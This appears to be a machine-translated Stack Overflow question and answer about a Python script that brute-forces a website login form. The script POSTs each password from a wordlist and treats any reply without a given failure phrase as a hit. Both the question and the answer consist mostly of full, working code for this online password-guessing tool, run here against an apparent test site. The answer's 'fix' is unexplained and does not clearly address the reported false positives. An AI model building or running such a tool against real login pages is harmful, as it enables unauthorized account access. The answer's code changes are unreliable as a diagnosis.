Python密码破解代码在每个密码上都会产生假阳性。
Python密码破解代码在每个密码上都会产生假阳性。
提问于 2022-01-01 00:29:40
当我运行命令程序时,认为每个密码都是正确的,但只有当它没有在网站上看到“无效登录详细信息”时,它才会这样想。怎么修呢?
我一直在努力想办法,但我什么也没看到,也许你会看到。
以前工作时,链接到github:
命令:
python3 script.py https://cracking.dresperanto.repl.co/logout.php admin passes.txt Login Username?Password?Submit 'Invalid Login Details'输出:
[ludwik@ludwik cracking program]$ python3 script.py https://cracking.dresperanto.repl.co/logout.php admin passes.txt Login Username?Password?Submit 'Invalid Login Details'
Data correctly loaded!
Data correctly prepared!
[('Username', 'admin', 'Password', 'password1', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'password2', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'password3', 'Submit', 'Login'), ('Username', 'admin', 'Password', '123456', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'ubuntuserver', 'Submit', 'Login'), ('Username', 'admin', 'Password', 'toor', 'Submit', 'Login')]
[ 1/6 ] Sending ('Username', 'admin', 'Password', 'password1', 'Submit', 'Login') for https://cracking.dresperanto.repl.co/logout.php
Password found!
Login: admin
Password: password1
Do you want to continue scan? (Y/N):代码:
import os
import sys
from time import sleep
import requests
from termcolor import cprint, colored
import colorama
colorama.init()
class Cracker():
def __init__(self, url, file, login, submit, params_names, fail_phrase):
self.submit = submit
self.url = url
self.fail = fail_phrase
self.file_name = file
if os.path.exists(file):
# Read data from file
self.passes = self.read_data(self.file_name)
cprint("Data correctly loaded!", "green")
# print(self.passes)
self.login = login
if len(login) == 0:
cprint("Login not specified!", "red")
sys.exit()
# Prepare data to send
try:
self.data = []
for pas in self.passes:
self.data.append((params_names[0], self.login, params_names[1], pas, params_names[2], self.submit))
cprint("Data correctly prepared!", "green")
print(self.data)
except IndexError:
cprint("Params names specified incorrectly", "red")
sys.exit()
# Send data to server
for index, single_data in enumerate(self.data):
print(" "*100, end="\r")
print(colored(f"[ {index+1}/{len(self.passes)} ] Sending {single_data} for {self.url}", "yellow"), end="\r")
if self.send(self.url, single_data, self.fail):
print("")
cprint("Password found!", "green")
print("Login:", colored(self.login, "blue"))
print("Password:", colored(single_data[3], "blue"))
ask = input("Do you want to continue scan? (Y/N): ")
if ask.upper() == "Y":
sys.exit()
print("")
else:
cprint("File could not be found!", "red")
sys.exit()
def read_data(self, filename):
with open(filename, 'r') as f:
lines = f.read().split('\n')
return lines
def send(self, url, data, fail):
ready_data = {data[0]: data[1], data[2]: data[3], data[4]: data[5]}
r = requests.post(url=url, data=ready_data)
if fail in r.text:
return False
else:
return True
# Managing arguments from console
try:
URL = sys.argv[1]
LOGIN = sys.argv[2]
PASS_FILE = sys.argv[3]
BUTTON_VALUE = sys.argv[4]
PARAMAS_NAMES = sys.argv[5].split('?')
FAIL = (sys.argv[6])
cracker = Cracker(URL, PASS_FILE, LOGIN, BUTTON_VALUE, (PARAMAS_NAMES[0], PARAMAS_NAMES[1], PARAMAS_NAMES[2]), FAIL)
except IndexError:
cprint("Usage: python script.py <url> <login> <pass_file> <button_value> <paramas_names, sepersted with '?'> <fail_phrase>", "red")
sys.exit()回答 1
Stack Overflow用户
发布于 2022-01-01 01:33:14
固定代码:
import os
import sys
from time import sleep
import requests
class Cracker():
def __init__(self, url, file, login, submit, params_names, fail_phrase):
self.submit = submit
self.url = url
self.fail = fail_phrase
self.file_name = file
if os.path.exists(file):
# Read data from file
self.passes = self.read_data(self.file_name)
print("Data correctly loaded!")
print(self.passes)
self.login = login
if len(login) == 0:
print("Login not specified!")
sys.exit()
# Prepare data to send
try:
self.data = []
for pas in self.passes:
self.data.append((params_names[0], self.login, params_names[1], pas, params_names[2], self.submit))
print("Data correctly prepared!")
print(self.data)
except IndexError:
print("Params names specified incorrectly")
sys.exit()
# Send data to server
for index, single_data in enumerate(self.data):
print(f"[ {index+1}/{len(self.passes)} ] Sending ", single_data, "for", self.url)
if self.send(self.url, single_data, self.fail):
print("Password found!")
print("Login:", self.login)
print("Password:", single_data[3])
else:
print("File could not be found!")
sys.exit()
def read_data(self, filename):
with open(filename, 'r') as f:
lines = f.read().split('\n')
return lines
def send(self, url, data, fail):
ready_data = {data[0]: data[1], data[2]: data[3], data[4]: data[5]}
r = requests.post(url=url, data=ready_data)
if fail in r.text:
return False
else:
return True
try:
URL = sys.argv[1]
PASS = sys.argv[2]
LOGIN = sys.argv[3]
BUTTON_VALUE = sys.argv[4]
PARAMS_NAMES = sys.argv[5].split('?')
FAIL = sys.argv[6]
cracker = Cracker(URL, PASS, LOGIN, BUTTON_VALUE, (PARAMS_NAMES[0], PARAMS_NAMES[1], PARAMS_NAMES[2]), FAIL)
except IndexError:
print("ERROR")页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/70546406
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号